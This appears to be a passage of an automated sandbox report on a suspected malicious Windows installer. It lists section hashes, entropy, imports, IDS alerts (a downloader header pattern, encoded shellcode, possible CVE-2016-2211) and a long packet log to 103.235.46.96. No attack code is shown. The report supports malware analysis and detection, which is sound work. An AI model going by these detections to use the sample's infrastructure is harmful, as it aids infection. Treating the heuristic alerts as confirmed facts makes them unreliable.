IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x61fc | 0x6200 | 23ca7817859f8050e8f75236183e7de8 | False | 0.6703204719387755 | data | 6.488858822196296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1cec | 0x1e00 | c3a1d271092e8086c1565dfde839ab8a | False | 0.42864583333333334 | data | 5.34212204300615 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x3e8dc | 0x200 | b37070216945156d234628d13558e720 | False | 0.1953125 | data | 1.4659748340026204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x49000 | 0x46000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x8f000 | 0x137f8 | 0x13800 | 0e4e8513f31f957d181ccfac728c5f1c | False | 0.023287259615384616 | data | 3.343629560642726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x8f2b0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.007955755353129066
RT_ICON | 0x9fad8 | 0xea8 | data | English | United States | 0.007196162046908316
RT_ICON | 0xa0980 | 0x8a8 | data | English | United States | 0.01128158844765343
RT_ICON | 0xa1228 | 0x568 | data | English | United States | 0.014450867052023121
RT_ICON | 0xa1790 | 0x468 | data | English | United States | 0.015957446808510637
RT_ICON | 0xa1bf8 | 0x2e8 | data | English | United States | 0.020161290322580645
RT_ICON | 0xa1ee0 | 0x128 | data | English | United States | 0.04391891891891892
RT_DIALOG | 0xa2008 | 0x1ee | data | English | United States | 0.3866396761133603
RT_DIALOG | 0xa21f8 | 0xe4 | data | English | United States | 0.6359649122807017
RT_DIALOG | 0xa22e0 | 0xda | data | English | United States | 0.6376146788990825
RT_GROUP_ICON | 0xa23c0 | 0x68 | data | English | United States | 0.7307692307692307
RT_MANIFEST | 0xa2428 | 0x3cd | XML 1.0 document, ASCII text, with very long lines (973), with no line terminators | English | United States | 0.5241521068859198
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryA, CreateProcessA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, RemoveDirectoryA, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, SetFilePointer, MulDiv, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcA, IsWindowVisible, LoadBitmapA, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuA, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, CheckDlgButton, DialogBoxParamA, GetClassInfoA, CreateWindowExA, SystemParametersInfoA, RegisterClassA, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, wvsprintfA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, LoadCursorA, SetCursor, GetWindowLongA, GetSysColor, CharNextA, SetWindowPos, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SetForegroundWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderA, SHGetPathFromIDListA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyA, RegOpenKeyExA, RegCloseKey, RegDeleteKeyA, RegDeleteValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumValueA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T02:19:58.844006+0200 | TCP | 2840787 | ETPRO HUNTING Request for config.json | 49713 | 443 | 192.168.2.7 | 184.28.90.27
2024-07-25T02:19:51.775160+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49699 | 80 | 192.168.2.7 | 103.235.46.96
2024-07-25T02:19:53.037690+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 80 | 49699 | 103.235.46.96 | 192.168.2.7
2024-07-25T02:19:53.251253+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 80 | 49699 | 103.235.46.96 | 192.168.2.7
2024-07-25T02:19:53.037548+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 80 | 49699 | 103.235.46.96 | 192.168.2.7
2024-07-25T02:20:06.787407+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49717 | 20.12.23.50 | 192.168.2.7
2024-07-25T02:20:45.968967+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49737 | 20.114.59.183 | 192.168.2.7
2024-07-25T02:19:53.034129+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 80 | 49699 | 103.235.46.96 | 192.168.2.7
2024-07-25T02:19:53.124191+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 80 | 49699 | 103.235.46.96 | 192.168.2.7
2024-07-25T02:19:53.037758+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 80 | 49699 | 103.235.46.96 | 192.168.2.7
2024-07-25T02:19:53.124522+0200 | TCP | 2012510 | ET SHELLCODE UTF-8/16 Encoded Shellcode | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 02:19:50.479415894 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:50.484323978 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:50.484451056 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:50.484626055 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:50.489912987 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.703547955 CEST | 49702 | 443 | 192.168.2.7 | 72.52.179.174
Jul 25, 2024 02:19:51.703622103 CEST | 443 | 49702 | 72.52.179.174 | 192.168.2.7
Jul 25, 2024 02:19:51.703717947 CEST | 49702 | 443 | 192.168.2.7 | 72.52.179.174
Jul 25, 2024 02:19:51.775079966 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775096893 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775110960 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775125980 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775135994 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775160074 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.775242090 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775253057 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.775254965 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775408030 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775418997 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775429964 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.775481939 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.775481939 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.775481939 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.782552004 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.782596111 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.782634020 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.782665014 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.782931089 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.782931089 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.800257921 CEST | 49702 | 443 | 192.168.2.7 | 72.52.179.174
Jul 25, 2024 02:19:51.800290108 CEST | 443 | 49702 | 72.52.179.174 | 192.168.2.7
Jul 25, 2024 02:19:51.867309093 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867366076 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867396116 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867422104 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867429972 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867465973 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867503881 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867508888 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867508888 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867547989 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867614031 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867670059 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867705107 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867714882 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867714882 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867746115 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867791891 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867825985 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.867883921 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.867883921 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.868520021 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.868588924 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.868623018 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.868635893 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.868635893 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.868659019 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.868694067 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.868695021 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.868792057 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.868792057 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.869396925 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.869441986 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.869476080 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.869597912 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.869597912 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.869597912 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985129118 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985212088 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985249996 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985249996 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985249996 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985305071 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985341072 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985392094 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985421896 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985421896 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985426903 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985430956 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985466957 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985512972 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985512972 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985585928 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985619068 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985654116 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985687971 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985726118 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985738039 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.985850096 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985850096 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985851049 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.985851049 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.986489058 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.986541986 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.986582994 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.986589909 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.986589909 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.986752987 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.986787081 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.986787081 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.986824036 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.986869097 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.987056971 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.987457037 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.987493038 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.987538099 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.987575054 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.987575054 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.987596989 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.987626076 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.987658978 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.987693071 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.987766981 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.987766981 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.988430023 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.988496065 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.988508940 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.988543987 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.988594055 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.988643885 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.988666058 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.988678932 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.988701105 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.988909960 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.989464045 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.989525080 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.989541054 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.989588976 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.989588976 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.989633083 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.989672899 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.989686966 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.989728928 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.989765882 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:51.990310907 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:51.990365982 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084085941 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084134102 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084192038 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084208012 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084228992 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084264040 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084299088 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084307909 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084307909 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084307909 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084333897 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084384918 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084419966 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084422112 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084422112 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084454060 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084456921 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084506035 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084523916 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084621906 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084673882 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084706068 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084739923 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084753036 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084753036 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084753036 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084753036 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084837914 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084844112 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084893942 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084927082 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084938049 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084939003 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.084960938 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.084994078 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.085027933 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.085176945 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.085176945 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.085176945 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.085176945 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.085503101 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.085591078 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.085623980 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.085706949 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.085706949 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.085706949 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.086008072 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.086042881 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.086112976 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.193495989 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.193546057 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.193600893 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.193600893 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.193881035 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.193937063 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.193972111 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194005966 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194045067 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194055080 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194082975 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194116116 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194161892 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194163084 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194349051 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194423914 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194438934 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194499016 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194515944 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194519043 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194519043 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194519043 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194534063 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194552898 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194592953 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194636106 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
Jul 25, 2024 02:19:52.194679976 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194695950 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194714069 CEST | 80 | 49699 | 103.235.46.96 | 192.168.2.7
Jul 25, 2024 02:19:52.194747925 CEST | 49699 | 80 | 192.168.2.7 | 103.235.46.96
